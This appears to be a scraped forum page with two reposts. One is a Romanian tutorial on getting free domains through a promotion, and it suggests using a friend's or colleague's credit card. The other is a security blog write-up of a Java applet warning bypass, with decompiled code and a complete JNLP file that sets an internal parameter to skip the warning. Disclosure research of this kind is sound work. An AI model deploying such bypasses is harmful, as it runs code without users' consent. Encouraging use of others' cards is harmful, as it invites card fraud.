Leaderboard

Dupa ce l-am ajutat pe sandabot, inregistrandu-i un domeniu gratis (vezi topicul: https://rstforums.com/forum/68045-imprumut-8-a.rst) , am primit cred ca vreo 15 PM-uri in aceeasi zi, de la membrii de pe forum, sa le inregistrez si lor un domeniu. Asa ca m-am decis sa impart metoda cu voi, se gaseste si pe forum-ul meu, postata de un user de pe forum.. Eu am folosit-o deja pentru 3 domenii si a mers brici. Domeniul este pentru 1 an. Tutorial Intram aici: Get Online - America Get Your Business Online 1. Apasam pe "Get on the web", dupa care pe Create your website -> Click 2. Sign in with Google -> Cu Gmail-u. 3. Dupa ce v-ati logat dati Continue. 4. OK , veti fi redirectionati la Intituit Website 5. Alegem: Choose a Domain (Yourname.com) for your website 6. Tastati ce nume vreti la site + domeniu. 7. Dupa ce ati terminat dati Get Domain (0.0$ deci ne trebe card) 8. Bagati datele cardului vostru real sau al unui prieten/coleg/cunoscut. 9. Congratulations your order is Complete. Gata ati facut domeniu. 10. Trebuie sa mutati NS-urile. Confirmarea contului se face in maxim 30m-1h. 11. Dupa ce v-a venit confirmarea si domeniu functioneaza dati la Edit DNS si configurati voi cum vreti mutati ns-urile astea la host-u vostru! Puteti sa folositi datele voastre reale, inclusiv Credit Card-ul, chiar e recomandat, cu exceptia numelui si a adresei, restul nu are nicio treaba, nu are de ce sa vie frica. Puteti folosi acelasi Credit Card, pentru mai multe domenii, la mine a mers. De unde pot face rost de Credit Card-uri? 1. Cel mai simlu si recomandat, folosit cardul vostru/fratelui/prietenului/colegului..... nu se intampla absolut nimic, si stati fara grija suspendarii contului. 2. Sper ca v-am ajutat , metoda merge 100% , am testat , este legala! Domeniul va functiona si nu va fi suspendat. Tutorial realizat de mine in totalitate!Daca doriti copierea acestuia postati si sursa.T-T! Video tutorial: PS: Puteti citi intreg topic-ul din sursa, in care sunt abordate mai multe probleme. Sursa: Thieves Team Programing&Security Board ? View topic - [METODA] Domenii gratis .com,.net,.biz,.info

[h=3]Yet Another Java Security Warning Bypass[/h]posted by: Nico Waisman Not so long ago we posted about a JavaSecurity Warning bypass that used a serialized applet instance. That bypass was fixed in Java 7 update 13 so we had to keep looking at new ways of defeating the warning pop-up that requires user interaction in order to run applets. We continued auditing the code that performed the checks when starting an applet and ended up arriving at the method “sun.plugin2.main.client.PluginMain.performSSVValidation(Plugin2Manager)” This method will end up calling some other methods in the com.sun.javaws.ui.SecureStaticVersioning class that will show us that annoying security warning pop up. But just take a quick look at the performSSVValidation method implementation: public static boolean performSSVValidation(Plugin2Manager paramPlugin2Manager) throws ExitException { boolean bool = Boolean.valueOf(paramPlugin2Manager. getParameter("__applet_ssv_validated")). booleanValue(); if (bool) return false; LaunchDesc localLaunchDesc = null; AppInfo localAppInfo = null; [...] // ... more code that calls com.sun.javaws.ui.SecureStaticVersioning to perform more checks [...] } What is that __applet_ssv_validated parameter?? Obviously this is an internal undocumented parameter and, as you can see, it turns out that if it is set to true, no checks are performed. The first thing we tried was to simply set that parameter to true in our evil applet, but it didn't work. While debugging we noticed that the parameter was not set on the applet despite our setting it to true. Basically sun.plugin2.main.server.MozillaPlugin.addParameter(String, String) is filtering the parameters: private void addParameter(String paramString1, String paramString2) { if ((paramString1 != null) && (paramString1.charAt(0) != '_') && (!paramString1.equals("PARAM"))) this.params.put(paramString1, paramString2); } But as you may know, Java provides another way of launching applets in a browser besides using the applet, object or embed tags. Java Web Start technology is what we can use. Now the applet description is provided by using a JNLP file and parameters can be set to the applet by using the <param> tag. We can see that when using Java Web Start, the performSSVValidation method is also called So lets try to launch an applet with Java Web Start and set the __applet_ssv_validated parameter to true with a JNLP file like this one: <?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="applet_security_bypass.jnlp"> <information> <title>Applet Test JNLP</title> <vendor>demo</vendor> <description>basic applet test</description> <offline-allowed/> </information> <resources> <j2se version="1.7" href="http://java.sun.com/products/autodl/j2se" /> <jar href="basicApplet.jar" main="true" /> </resources> <applet-desc name="Demo Applet" main-class="Main" width="1" height="1"> <param name="__applet_ssv_validated" value="true"></param> </applet-desc> <update check="background"/> </jnlp> And by know you have already realized that this just works and parameters are not filtered. The Security Warning pop-up message is not displayed and our applet happily runs! Ironically on Tuesday 16th April, exactly while I was at the Infiltrate MasterClass teaching how to audit and exploit Java, Oracle released update 21 which fixed this bypass and a ton of others. The time investment for stealthily exploiting Java is increasing but finding bypasses like this makes it worth the time! Esteban Guillardoy Sursa: Immunity Products: Yet Another Java Security Warning Bypass